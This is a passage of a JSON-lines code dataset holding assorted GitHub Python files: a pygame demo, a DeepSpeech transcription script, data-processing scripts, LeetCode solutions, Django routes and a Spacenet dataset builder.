клавиатуры\")\n\nWHITE = (255, 255, 255)\nBLUE = (0, 0, 255)\n\nFPS = 60\nclock = pygame.time.Clock()\n\nx = WIDTH//2\ny = HEIGHT//2\nspeed = 5\n\n\nwhile 1:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n x -= speed\n elif keys[pygame.K_RIGHT]:\n x += speed\n\n screen.fill(WHITE)\n pygame.draw.rect(screen, BLUE, (x, y, 10, 20))\n pygame.display.update()\n\n clock.tick(FPS)\n","repo_name":"KuBaN658/infa_2022_KuBaN658","sub_path":"lab3/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3113495778","text":"#!/usr/bin/env python3\n\"\"\"\nThis script will use deepspeech and convert the audio file to text\nauthor: sachin2001g@gmail.com\n\"\"\"\nimport argparse\nimport numpy as np\nimport shlex\nimport subprocess\nimport sys\nimport wave\nimport json\nimport time\nimport deepspeech\n\nfrom timeit import default_timer as timer\n\ntry:\n from shhlex import quote\nexcept ImportError:\n from pipes import quote\n\nMODEL_PATH = \"D:\\InOut\\Deepspeech\\deepspeech-0.8.2-models\\deepspeech-0.8.1-models.pbmm\"\nSCORER_PATH = \"D:\\InOut\\Deepspeech\\deepspeech-0.8.2-models\\deepspeech-0.8.1-models.scorer\"\n\ndef convert_samplerate(audio_path, desired_sample_rate):\n sox_cmd = 'sox {} --type raw --bits 16 --channels 1 --rate {} --encoding signed-integer --endian little --compression 0.0 --no-dither - '.format(quote(audio_path), desired_sample_rate)\n try:\n output = subprocess.check_output(shlex.split(sox_cmd), stderr=subprocess.PIPE)\n except subprocess.CalledProcessError as e:\n raise RuntimeError('SoX returned non-zero status: {}'.format(e.stderr))\n except OSError as e:\n raise OSError(e.errno, 'SoX not found, use {}hz files or install it: {}'.format(desired_sample_rate, e.strerror))\n\n return desired_sample_rate, np.frombuffer(output, np.int16)\n\n\ndef main():\n \n parser = argparse.ArgumentParser(description='Speech to text using deepspeech')\n parser.add_argument('--audio', required=True, help='Path to the audio file to run (WAV format)')\n args = parser.parse_args()\n audio_path = args.audio\n #initialise model\n model = deepspeech.Model(MODEL_PATH)\n #configure scorer\n model.enableExternalScorer(SCORER_PATH)\n fin = wave.open(audio_path, 'rb')\n fs_orig = fin.getframerate()\n desired_sample_rate = model.sampleRate()\n fs_new, audio = convert_samplerate(audio_path, desired_sample_rate)\n audio_length = fin.getnframes() * (1/fs_orig)\n print(\"audio-length {}\".format(str(audio_length)))\n output_text = model.stt(audio)\n print(output_text)\n file_name = \"{}_text_{}.txt\".format(audio_path.split(\"/\")[-1],str(time.time()))\n output_text_file = open(file_name, \"a\")\n output_text_file.write(output_text)\n output_text_file.close()\n\n\nif __name__ == '__main__':\n main()","repo_name":"sachinbhat2001/speech-to-text-using-deepspeech","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22689733973","text":"# To replace foldSelectSPSs in openbiomind!\n\n# SNP Binarization - Not purely mathematical so read this!!\n# In Binarizing SNPs we use the fact that most SNPS only has two significant versions, as denoted 1 or 2 in the formats. during binarization we define this as ABSENCE(0) OR PRESENCE(1) OF THE WILD TYPE VARIANT (2).\n# Assumptions is that the presence of recessive alleles are completely silenced by the presence of dominant version. (Thats a BIG assumption!!!)\n\nimport sys\n\nFile = sys.argv[1]\nFile = '../base/well.tab'\nOFile = './wellT.tab'\n\nFile = [x.rstrip().split('\\t') for x in open(File).readlines()]\n\nout = [File[0]]\n\ntargetLine = ['']\nfor x in File[1]:\n\tif x == targetCategory:\n\t\ttargetLine.append('1')\n\telse:\n\t\ttargetLine.append('0')\n\nout.append(targetLine)\n\ndef mapFunc(List):\n\tout = [List[0]]\n\tfor x in List[1:]:\n\t\tif '2' in x:\n\t\t\tout.append('1')\n\t\telse:\n\t\t\tout.append('0')\n\treturn out\n\nfor x in File[2:]:\n\tout.append(mapFunc(x))\n\nOFILE = open(OFile,'w')\nfor x in out:\n\tOFILE.write('\\t'.join(x)+'\\n')\n\nOFILE.close()\n","repo_name":"kurekaoru/biomind_gaga","sub_path":"pyutils/binarizeSNP.py","file_name":"binarizeSNP.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23950477788","text":"class Solution:\r\n def reconstructQueue(self, people: list) -> list:\r\n # sort in ascending order of number of people in front of each person\r\n people.sort(key=lambda x: x[1])\r\n # sort in descending order of height\r\n people.sort(reverse=True, key=lambda x: x[0])\r\n ans = []\r\n # rearrange people according to number of people in front of each person\r\n for p in people:\r\n ans.insert(p[1], p)\r\n return ans\r\n\r\n\r\npeople = [[7, 0], [4, 4], [7, 1], [5, 0], [6, 1], [5, 2]]\r\nprint(f\"Input: {people}\")\r\nprint(f\"Output: {Solution().reconstructQueue(people)}\")\r\n","repo_name":"rajitbanerjee/leetcode","sub_path":"src/queueReconstruct/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36493253771","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport sys\n\n### Get arguments and init ###\nif len(sys.argv) < 3:\n\tprint(\"Please a file and a column\")\n\tsys.exit()\n\nfilename = str(sys.argv[1])\ncolumn = int(sys.argv[2])\n\n### Read CSV file ###\nfilename = sys.argv[1]\ncsv_file = pd.read_csv(filename)\n\n### Extract column ###\nresult = csv_file.values[: , column]\ncname = csv_file.columns[column]\n\n### Normalize ###\nresult_mean = np.mean(result)\nresult_std = np.std(result)\n\nprint(\"Mean:\", result_mean)\nprint(\"Std:\", result_std)\n\nresult_max = np.max(result)\nresult_min = np.min(result)\n\nprint(\"Max:\", result_max)\nprint(\"Min:\", result_min)\n\nresult = (result - result_mean) / result_std\n#result = (result - result_min) / (result_max - result_min)\n\nif min(result) < 0:\n\tprint(\"Warning! You are using a dataset with negative values!\")\n\n### Save to csv ###\ndataframe = pd.DataFrame(result)\n\ncsv_name = filename.split('.')[0] + \"_\" + cname + \".csv\"\n\ndataframe.to_csv(csv_name, mode=\"w\", index=False, header=False)\n","repo_name":"Sphinx-Galaxy/master-thesis","sub_path":"Scripts/csv_extract.py","file_name":"csv_extract.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5479017070","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = \"Sponge_sy\"\n# Date: 2020/2/21\n\nfrom embeddings import sent_emb_sif, word_emb_elmo\nfrom model.method import SIFRank, SIFRank_plus\nimport thulac\nimport time\nimport os\nimport csv\nfrom model import util\nimport logging\nimport multiprocessing as mp\nfrom multiprocessing import Process,Lock,Queue,Value\nlogger = util.get_logger(__name__, debug=1)\n\n#user_dict_file=r'./auxiliary_data/keyword_vocab_final'\n##user_dict_file=r'./auxiliary_data/user_dict.txt'\n#model_file = r'./auxiliary_data/zhs.model/'\n#ELMO = word_emb_elmo.WordEmbeddings(model_file, cuda_device=5)\n#SIF = sent_emb_sif.SentEmbeddings(ELMO, lamda=1.0)\n#zh_model = thulac.thulac(model_path=r'./auxiliary_data/thulac.models/',user_dict=user_dict_file)\n#elmo_layers_weight = [0.0, 1.0, 0.0]\n\ndef load_cut_dict(user_dict_file):\n trie_dict = dict()\n with open(user_dict_file, \"r\", encoding=\"utf-8\") as fp:\n for line in fp:\n cut_parts = line.strip().split(' ')\n num = len(cut_parts)\n tmp_dict = trie_dict\n for i in range(num):\n p = cut_parts[i]\n if p in tmp_dict:\n tmp_dict = tmp_dict[p]\n else:\n tmp_dict[p] = dict()\n tmp_dict = tmp_dict[p]\n if i == num - 1:\n tmp_dict.update({\"is_leaf\":1})\n return trie_dict\n\n\ndef load_user_dict(user_dict_file):\n user_dict = set()\n with open(user_dict_file, \"r\", encoding=\"utf-8\") as fp:\n for line in fp:\n word = line.strip().split('\\t')[0]\n word = word.lower()\n user_dict.add(word)\n return user_dict\n\n\ndef load_kw_info(kw_info_file, encoding=\"utf-8\"):\n kw_info = dict()\n with open(kw_info_file, \"r\", encoding=encoding) as fp:\n for line in fp:\n parts = line.strip().split('\\t')\n if len(parts) != 4:\n continue\n kw, qv, df, idf = parts[0], int(parts[1]), int(parts[2]), float(parts[3])\n kw_info[kw] = (idf,df,qv)\n return kw_info\n\n\ndef extract_keyword(text, SIF, zh_model, elmo_layers_weight, plus=False, topk=15, kwdict=None, kw_info=None, cut_dict=False, seg_only=True):\n if plus == False:\n keyphrases = SIFRank(text, SIF, zh_model, N=topk,elmo_layers_weight=elmo_layers_weight, kwdict=kwdict, kw_info=kw_info, cut_dict=cut_dict, seg_only=True)\n else:\n keyphrases = SIFRank_plus(text, SIF, zh_model, N=topk, elmo_layers_weight=elmo_layers_weight, kwdict=kwdict, kw_info=kw_info, cut_dict=cut_dict, seg_only=True)\n return keyphrases\n\ndef load_articles(input_file):\n docids = []\n texts = []\n with open(input_file, \"r\", encoding=\"utf-8\") as fp:\n for idx,line in enumerate(fp):\n parts = line.strip().split('\\t')\n if len(parts) < 3:\n print(\"[parts error]less 3\")\n continue\n docid = parts[0]\n title = parts[1]\n content = parts[2]\n text = title + \"\\t\" + content\n docids.append(docid)\n texts.append(text)\n if idx < 5:\n print(\"[check_data]docid:%s, title:%s, content:%s\" %(docid, title, content))\n return docids, texts\n\n\ndef load_tencent_articles(input_file):\n docids = []\n texts = []\n with open(input_file, \"r\", encoding=\"utf-8\") as fp:\n for idx,line in enumerate(fp):\n parts = line.strip().split('\\t')\n if len(parts) < 5:\n continue\n docid = parts[0]\n title = parts[3]\n content = parts[4]\n text = title + \"\\t\" + content\n docids.append(docid)\n texts.append(text)\n if idx < 5:\n print(\"[check_data]docid:%s, title:%s, content:%s\" %(docid, title, content))\n return docids, texts\n\n\nclass ExtractWorker(Process):\n def __init__(self, recv_queue, push_queue, stop_sign, worker_id, gpu_id=0, plus=True, seg_only=True, elmo_layers_weight=[0.5, 1.0, 0.5], cut_dict=False, logger=logging.getLogger()):\n super(ExtractWorker, self).__init__()\n self.user_dict_file=r'./auxiliary_data/keyword_vocab_final'\n self.cut_dict_file=r'/search/odin/liruihong/keyword-project/data/keywords_vocab/keyword_vocab_final_cut'\n self.kw_info_file=r'/search/odin/liruihong/keyword-project/config_data/ret_item_info'\n self.model_file = r'./auxiliary_data/zhs.model/'\n self.seg_only = seg_only\n self.gpu_id = gpu_id\n if cut_dict == False:\n self.user_dict = load_user_dict(self.user_dict_file)\n else:\n self.user_dict = load_cut_dict(self.user_dict_file)\n self.cut_dict = cut_dict\n self.kw_info = load_kw_info(self.kw_info_file, encoding=\"gbk\")\n self.elmo_layers_weight = elmo_layers_weight\n self.recv_queue = recv_queue\n self.push_queue = push_queue\n self.stop_sign = stop_sign\n self.plus = plus\n self.worker_id = worker_id\n self.logger = logger\n\n def run(self):\n self.ELMO = word_emb_elmo.WordEmbeddings(self.model_file, cuda_device=self.gpu_id)\n self.SIF = sent_emb_sif.SentEmbeddings(self.ELMO, lamda=1.0)\n if self.cut_dict == True:\n self.zh_model = thulac.thulac(model_path=r'./auxiliary_data/thulac.models/', seg_only=self.seg_only)\n else:\n self.zh_model = thulac.thulac(model_path=r'./auxiliary_data/thulac.models/',user_dict=self.user_dict_file, seg_only=self.seg_only)\n while self.stop_sign.value == 0:\n if self.recv_queue.empty() == False:\n try:\n data = self.recv_queue.get(True, 1)\n except Exception as e:\n continue\n docid = data[0]\n text = data[1]\n if len(text) > 4000:\n text = text[0:4000]\n # [title, content] = text.split('\\t')\n self.logger.info(\"worker_process[%d] %s, len:%d\" %(self.worker_id, docid, len(text)))\n keywords = extract_keyword(text, self.SIF, self.zh_model, self.elmo_layers_weight, plus=self.plus,\n topk=20, kwdict=self.user_dict, kw_info=self.kw_info, cut_dict=self.cut_dict, seg_only=self.seg_only)\n\n self.logger.info(\"worker_succ[%d] %s\" %(self.worker_id, docid))\n self.logger.info(\"worker_succ[%d] %s %s\" %(self.worker_id, docid, keywords))\n #self.push_queue.put([docid, title_kw, content_kw])\n self.push_queue.put([docid, keywords])\n\n self.logger.info(\"stop worker[%d]\" %(self.worker_id))\n\n\ndef multiprocess_extract_keywords(input_file, output_file, process_num=1, gpu_ids=[0], plus=True, elmo_layers_weight=[1.0, 0.0, 0.0], cut_dict=False, seg_only=True):\n input_que = Queue()\n output_que = Queue()\n #docids, texts = load_tencent_articles(input_file)\n docids, texts = load_articles(input_file)\n total_num = len(docids)\n real_num = 0\n for i in range(total_num):\n if i >= 40:\n break\n real_num += 1\n docid = docids[i]\n text = texts[i]\n input_que.put([docid, text])\n\n stop_sign = Value('i', 0) # 进程间共享停止变量\n worker_list = []\n for i in range(process_num):\n gpu_idx = i % (len(gpu_ids))\n logger.info(\"create worker[%d] on gpu_%d\" %(i, gpu_ids[gpu_idx]))\n worker = ExtractWorker(input_que, output_que, stop_sign, worker_id=i, gpu_id=gpu_ids[gpu_idx], plus=plus, seg_only=seg_only,\n elmo_layers_weight=elmo_layers_weight, cut_dict=cut_dict, logger=logger)\n worker_list.append(worker)\n\n\n for i,worker in enumerate(worker_list):\n worker.start()\n logger.info(\"start worker[%d]\" %(i))\n\n st = time.time()\n res_num = 0\n wfp = open(output_file, \"w\", encoding=\"utf-8\")\n speed_st = time.time()\n speed_count = 0\n while True:\n if res_num == real_num:\n break\n if output_que.empty() == False:\n try:\n data = output_que.get(True, 1)\n except Exception as e:\n logger.error(\"multiprocess_extract_keywords output_que.get Exception:%s\" % (e))\n continue\n docid = data[0]\n keywords = data[1]\n #title_keywords = data[1]\n #content_keywords = data[2]\n #writer_title = \" \".join([\"%s:%s\" % (kw, \",\".join([\"%f\" %(x) for x in score])) for kw,score in title_keywords])\n #writer_content = \" \".join([\"%s:%s\" % (kw, \",\".join([\"%f\" %(x) for x in score])) for kw,score in content_keywords])\n writer_keywords = \"\\t\".join([\"%s:%s\" % (kw_score[0], \",\".join([\"%f\" %(x) for x in kw_score[1:]])) for kw_score in keywords])\n #writer_line = \" \".join([\"%s:%f\" % (k,s) for k,s in keywords])\n #wfp.write(\"%s\\t%s\\t%s\\n\" % (docid, writer_title, writer_content))\n logger.info(\"%s\\t%s\\n\" % (docid, writer_keywords))\n wfp.write(\"%s\\t%s\\n\" % (docid, writer_keywords))\n res_num += 1\n logger.info(\"[succ]%s\" %(docid))\n speed_count += 1\n speed_ed = time.time()\n if int(speed_ed - speed_st) >= 60:\n #speed = speed_count/60\n logger.info(\"[check_speed]%d/minute\" %(speed_count))\n speed_st = time.time()\n speed_count = 0\n\n wfp.close()\n ed = time.time()\n cost = int((ed - st)/60)\n logger.info(\"all data cost:%d minutes %d seconds\" %(cost, int(ed-st)))\n stop_sign.value = 1\n for worker in worker_list:\n worker.join()\n logger.info(\"finish all work\")\n\n\nif __name__ == \"__main__\":\n # input_file = \"/search/odin/liruihong/keyword-project/input_data/new_articles_7d.tsv\"\n # output_file = \"/search/odin/liruihong/keyword-project/output_data/new_articles_7d_kw.tsv\"\n input_file = \"/search/odin/liruihong/keyword-project/input_data/test_articles.tsv\"\n output_file = \"/search/odin/liruihong/keyword-project/output_data/text_articles_kw_siftr\"\n multiprocess_extract_keywords(input_file, output_file, process_num=4, gpu_ids=[3,4,5,6], plus=True, elmo_layers_weight=[1.0, 0.0, 0.0], cut_dict=False, seg_only=True)\n\n","repo_name":"alwayschasing/KWSIFRank","sub_path":"multiprocess_extract.py","file_name":"multiprocess_extract.py","file_ext":"py","file_size_in_byte":10293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11791189","text":"import asyncio\nimport logging\nimport platform\nimport sys\nfrom asyncio import sleep\n\nimport aiohttp\nimport coloredlogs\n\nfrom app.URLS import URL_TASKS, URL_GET_JWT\nfrom app.headers import base_headers, api_headers\nfrom app.models_pdc import Task\nfrom app.request_shecker import request_dispatcher, send_answers\nfrom app.settings import settings\n\n\nasync def get_root_jwt():\n async with aiohttp.ClientSession() as session:\n json = {\n \"username\": settings().API_LOGIN,\n \"password\": settings().API_PASSWORD,\n }\n async with session.post(URL_GET_JWT, data=json) as resp:\n if resp.status != 200:\n logging.info(\"JWT token not received!!!\")\n sys.exit(-1)\n data = await resp.json()\n logging.info(\"Root jwt successfully received\")\n return f\"Bearer {data['access_token']}\"\n\n\nasync def get_tasks() -> list[Task]:\n tasks = []\n async with aiohttp.ClientSession(headers=api_headers) as session:\n async with session.get(URL_TASKS) as resp:\n data = await resp.json()\n for task in data:\n tasks.append(Task(**task))\n return tasks\n\n\nasync def watcher():\n while True:\n logging.info(\"Watcher iteration\")\n tasks = await get_tasks()\n answers = await request_dispatcher(tasks)\n logging.info(\"Responses received, sending... \")\n await send_answers(answers)\n logging.info(\"Sending completed\")\n await sleep(settings().CHECK_TIMEOUT)\n\n\nasync def main():\n coloredlogs.install(level=logging.INFO)\n logging.info(\"Startup\")\n root_jwt = await get_root_jwt()\n api_headers[\"Authorization\"] = root_jwt\n await watcher()\n\n\nif __name__ == \"__main__\":\n try:\n if platform.system() == 'Windows':\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n asyncio.run(main())\n except (KeyboardInterrupt, SystemExit):\n logging.error(\"Checker stopped!\")\n","repo_name":"CupSoft/webeye","sub_path":"checker/app/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"18466498618","text":"import six\nfrom stolos import exceptions\n\nfrom . import shared\n\n\ndef validate_state(\n pending, completed, failed, skipped, all=False, multi=False):\n \"\"\"Helper function to that raises UserWarning if user's request defines\n an invalid combination of job states\n \"\"\"\n cnt = pending + completed + failed + skipped\n if multi:\n if cnt < 1 and not all:\n raise UserWarning(\n \"you must request at least one of these states:\"\n \" pending, completed, failed, skipped\")\n else:\n if cnt != 1:\n raise UserWarning(\n \"you must request exactly one of these states:\"\n \" pending, completed, failed, skipped\")\n rv = []\n if all or pending:\n rv.append(shared.PENDING)\n if all or completed:\n rv.append(shared.COMPLETED)\n if all or failed:\n rv.append(shared.FAILED)\n if all or skipped:\n rv.append(shared.SKIPPED)\n if multi:\n return rv\n else:\n return rv[0]\n\n\ndef check_state(app_name, job_id, raise_if_not_exists=False,\n pending=False, completed=False, failed=False, skipped=False,\n all=False, _get=False):\n \"\"\"Determine whether a specific job is in one or more specific state(s)\n\n If job_id is a string, return a single value.\n If multiple job_ids are given, return a list of values\n\n `app_name` is a task identifier\n `job_id` (str or list of str) is a subtask identifier or a list of them\n `all` (bool) if True, return True if the job_id is in a recognizable state\n `_get` (bool) if True, just return the string value of the state and\n ignore the (pending, completed, xor failed) choice\n \"\"\"\n qbcli = shared.get_qbclient()\n if isinstance(job_id, six.string_types):\n job_ids = [job_id]\n rvaslist = False\n else:\n job_ids = job_id\n rvaslist = True\n\n rv = []\n for job_id in job_ids:\n job_path = shared.get_job_path(app_name, job_id)\n try:\n gotstate = qbcli.get(job_path)\n except exceptions.NoNodeError:\n if raise_if_not_exists:\n raise\n else:\n rv.append(False)\n continue\n if _get:\n rv.append(gotstate)\n continue\n else:\n accepted_states = validate_state(\n pending, completed, failed, skipped, all=all, multi=True)\n rv.append(gotstate in accepted_states)\n continue\n if rvaslist:\n return rv\n else:\n return rv[0]\n","repo_name":"sailthru/stolos","sub_path":"stolos/queue_backend/read_job_state.py","file_name":"read_job_state.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"40"} +{"seq_id":"30864864484","text":"from django.urls import path\nfrom . import views\n\napp_name = 'magasin'\n\nurlpatterns = [\n path('dashboard', views.dashboard, name='dashboard'), # dashboard\n path('magasin', views.article_list, name='article_list'), # list of all articles\n path('magasin//', views.article_list, name='article_list_by_category'), # list of articles by category\n path('magasin/stock_alarm/', views.article_list, name='stock_alarm'), # stock alarm\n path('magasin/art_sans_prix/', views.article_list, name='art_sans_prix'), # Qte Sans prix\n\n path('magasin///', views.article_detail, name='article_detail'), # article details\n\n # Django-bootstrap-modal-forms URLS\n path('read-article//', views.ReadArticle.as_view(), name='read_article'), # article detail boots modal\n path('create-category/', views.CreateCategoryView.as_view(), name='create_category'), # create category\n path('create-article/', views.CreateArticleView.as_view(), name='create_article'), # create article\n path('update-article//', views.UpdateArticleView.as_view(), name='update_article'), # update article\n path('delete-article//', views.DeleteArticleView.as_view(), name='delete_article'), # delete article\n\n # Django-bootstrap-modal-forms with custom view\n path('entree-article//', views.entree_article_view, name='entree'), # new entry\n path('sortie-article//', views.sortie_article_view, name='sortie'), # new sortie\n\n # History\n path('magasin/history', views.magasin_log, name='magasin_log'), # article history\n path('magasin/history//', views.magasin_log, name='magasin_log_article'), # article history\n\n # Movement\n path('magasin/movement', views.movement, name='movement'), # All movement\n path('magasin/movement//', views.movement, name='movement_article'), # Movement by article.\n path('magasin/movement/etats', views.etats, name='etats'), # etats journalier, mensuel\n path('delete-movement//', views.DeleteMovementView.as_view(), name='delete_movement'), # delete movement\n\n # this url is a django-bootstrap-modal with custom view\n path('magasin/total_article', views.total_articles, name='total_articles'),\n\n # commands urls\n path('magasin/commands', views.manage_command, name='manage_command'), # all commands\n path('magasin/commands/', views.manage_command, name='manage_command'), # Active Command\n path('create-command/', views.CreateCommandView.as_view(), name='create_command'), # create command\n path('read-command/', views.ReadCommand.as_view(), name='read_command'), # Commande Details\n\n # Gestion Stocks\n # path('magasin/gestion_stocks', views.gestion_stocks, name='gestion_stocks'), # all movement\n]\n","repo_name":"bdabve/inventory","sub_path":"magasin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27174450865","text":"from image_utils import *\nimport os\nimport tensorflow as tf\nfrom numpy import newaxis\n\nWIDTH=128\nSTRIDE=128\n\ndef extract_patches(sess,data,width,stride):\n '''\n Extract patches from images \n :data input image \n :width dimensiton of the patch\n :stride stride of patch selection on the image\n '''\n print('Patch extraction with stride=%d and width=%d begins'%(stride,width) )\n data_pl=tf.placeholder(tf.float64, [data.shape[0],data.shape[1],data.shape[2],data.shape[3]], name='data_placeholder')\n data_o=tf.extract_image_patches(images=data_pl,ksizes=[1,width,width,1],strides=[1,stride,stride,1],rates=[1,1,1,1],padding='VALID')\n print('Patch extraction done')\n size_tot=data_o.get_shape().as_list()\n data_o=tf.reshape(data_o,[size_tot[1]*size_tot[2],width,width,data.shape[3]])\n \n Data_o= sess.run(data_o,feed_dict={data_pl: data})\n print('%d patches of size %d x %d created as list'%(Data_o.shape[0],Data_o.shape[1],Data_o.shape[2]))\n return Data_o\n \npath_raw='../SPACENET_DATA/SPACENET_DATA_PROCESSED/RAW_IMAGES/'\n\npath_dataset='../SPACENET_DATA/SPACENET_DATA_PROCESSED/DATASET/128_x_128_8_bands_pansh/'\nif not os.path.exists(path_dataset):\n os.makedirs(path_dataset)\n\ntraining_ratio=0.8 #so test_ratio=0.2\nvalidation_ratio=0.2\n\npath_panchro=[]\npath_pansharp=[]\npath_groundtruth=[]\n\nfor citydir in sorted(os.listdir(path_raw)):\n if citydir.startswith('AOI_1_RIO'):\n continue\n else:\n for bandsdir in sorted(os.listdir(os.path.join(path_raw,citydir))):\n if bandsdir.startswith('PANCHRO'):\n for filename in sorted(os.listdir(os.path.join(path_raw,citydir,bandsdir))):\n path_panchro.append(os.path.join(path_raw,citydir,bandsdir,filename))\n if bandsdir.startswith('PANSHARP'):\n for filename in sorted(os.listdir(os.path.join(path_raw,citydir,bandsdir))):\n path_pansharp.append(os.path.join(path_raw,citydir,bandsdir,filename))\n if bandsdir.startswith('GROUNDTRUTH'):\n for filename in sorted(os.listdir(os.path.join(path_raw,citydir,bandsdir))):\n path_groundtruth.append(os.path.join(path_raw,citydir,bandsdir,filename))\n \n \nprint('Do the splitting for ORIGINAL SIZE of patches\\n') \npath_panchro=np.asarray(path_panchro)\nprint('Length List panchro %d'%path_panchro.shape)\npath_pansharp=np.asarray(path_pansharp)\nprint('Length List pansharp %d'%path_panchro.shape)\npath_groundtruth=np.asarray(path_groundtruth)\nprint('Length List groundtruth %d'%path_panchro.shape)\n\n\nidx_shuffle = np.arange(len(path_panchro))\nnp.random.shuffle(idx_shuffle)\n\n\npath_panchro=path_panchro[idx_shuffle]\npath_pansharp=path_pansharp[idx_shuffle]\npath_groundtruth=path_groundtruth[idx_shuffle]\n\n\n#Do the split\ntraining_size=int(round(training_ratio*path_panchro.shape[0]))\ntest_size=path_panchro.shape[0]-training_size\nvalidation_size=int(round(validation_ratio*training_size))\ntraining_size=training_size-validation_size\n\nprint('Split (TRAINING - VALIDATION:%f) - TEST:%f done'%(1-validation_ratio,training_ratio))\nprint('Training size:%d, Validation size:%d, Test size: %d'%(training_size,validation_size,test_size))\n\n\nif not os.path.exists(path_dataset+'TRAINING'):\n os.makedirs(path_dataset+'TRAINING')\n if not os.path.exists(path_dataset+'TRAINING/INPUT'):\n os.makedirs(path_dataset+'TRAINING/INPUT')\n if not os.path.exists(path_dataset+'TRAINING/OUTPUT'):\n os.makedirs(path_dataset+'TRAINING/OUTPUT')\nif not os.path.exists(path_dataset+'VALIDATION'):\n os.makedirs(path_dataset+'VALIDATION')\n if not os.path.exists(path_dataset+'VALIDATION/INPUT'):\n os.makedirs(path_dataset+'VALIDATION/INPUT')\n if not os.path.exists(path_dataset+'VALIDATION/OUTPUT'):\n os.makedirs(path_dataset+'VALIDATION/OUTPUT')\nif not os.path.exists(path_dataset+'TEST'):\n os.makedirs(path_dataset+'TEST')\n if not os.path.exists(path_dataset+'TEST/INPUT'):\n os.makedirs(path_dataset+'TEST/INPUT')\n if not os.path.exists(path_dataset+'TEST/OUTPUT'):\n os.makedirs(path_dataset+'TEST/OUTPUT')\nwith tf.Session() as sess:\n count_tr=0 \n print('BUILD TRAINING SET')\n for i in range(training_size):\n filename=path_pansharp[i].split('pansharp_')[1]\n filename=filename.split('.h5')[0]\n\n panchro=read_data_h5(path_panchro[i])\n pansharp=read_data_h5(path_pansharp[i])\n groundtruth=read_data_h5(path_groundtruth[i])\n input_=np.concatenate((panchro,pansharp),axis=3)\n output_=groundtruth\n\n input_=extract_patches(sess,input_,WIDTH,STRIDE)\n output_=extract_patches(sess,output_,WIDTH,STRIDE)\n\n for j in range(input_.shape[0]):\n write_data_h5(path_dataset+'TRAINING/INPUT/input_'+filename+'_'+str(j)+'.h5',input_[j,:,:,:])\n write_data_h5(path_dataset+'TRAINING/OUTPUT/output_'+filename+'_'+str(j)+'.h5',output_[j,:,:,0])\n count_tr+=1\n\n\n print('BUILD VALIDATION SET')\n count_val=0\n for i in range(training_size,training_size+validation_size):\n filename=path_pansharp[i].split('pansharp_')[1]\n filename=filename.split('.h5')[0]\n\n panchro=read_data_h5(path_panchro[i])\n pansharp=read_data_h5(path_pansharp[i])\n groundtruth=read_data_h5(path_groundtruth[i])\n input_=np.concatenate((panchro,pansharp),axis=3)\n output_=groundtruth\n\n input_=extract_patches(sess,input_,WIDTH,STRIDE)\n output_=extract_patches(sess,output_,WIDTH,STRIDE)\n\n for j in range(input_.shape[0]):\n write_data_h5(path_dataset+'VALIDATION/INPUT/input_'+filename+'_'+str(j)+'.h5',input_[j,:,:,:])\n write_data_h5(path_dataset+'VALIDATION/OUTPUT/output_'+filename+'_'+str(j)+'.h5',output_[j,:,:,0])\n count_val+=1\n\n count_test=0\n\n print('BUILD TEST SET')\n for i in range(training_size+validation_size,path_panchro.shape[0]):\n filename=path_pansharp[i].split('pansharp_')[1]\n filename=filename.split('.h5')[0]\n\n panchro=read_data_h5(path_panchro[i])\n pansharp=read_data_h5(path_pansharp[i])\n groundtruth=read_data_h5(path_groundtruth[i])\n input_=np.concatenate((panchro,pansharp),axis=3)\n output_=groundtruth\n\n input_=extract_patches(sess,input_,WIDTH,STRIDE)\n output_=extract_patches(sess,output_,WIDTH,STRIDE)\n for j in range(input_.shape[0]):\n write_data_h5(path_dataset+'TEST/INPUT/input_'+filename+'_'+str(j)+'.h5',input_[j,:,:,:])\n write_data_h5(path_dataset+'TEST/OUTPUT/output_'+filename+'_'+str(j)+'.h5',output_[j,:,:,0])\n count_test+=1\n \nprint('Elements in Training set %d'%count_tr) \nprint('Elements in Validation set %d'%count_val) \nprint('Elements in Test set %d'%count_test) ","repo_name":"melissande/dhi-segmentation-buildings","sub_path":"Data_Handle/build_dataset_spacenet.py","file_name":"build_dataset_spacenet.py","file_ext":"py","file_size_in_byte":6885,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"10786755595","text":"# Time: O(n)\n# Space: O(1)\n\nclass Solution(object):\n def fizzBuzz(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n result = []\n\n for i in xrange(1, n+1):\n if i % 15 == 0:\n result.append(\"FizzBuzz\")\n elif i % 5 == 0:\n result.append(\"Buzz\")\n elif i % 3 == 0:\n result.append(\"Fizz\")\n else:\n result.append(str(i))\n\n return result\n\n def fizzBuzz2(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n l = [str(x) for x in range(n + 1)]\n l3 = range(0, n + 1, 3)\n l5 = range(0, n + 1, 5)\n for i in l3:\n 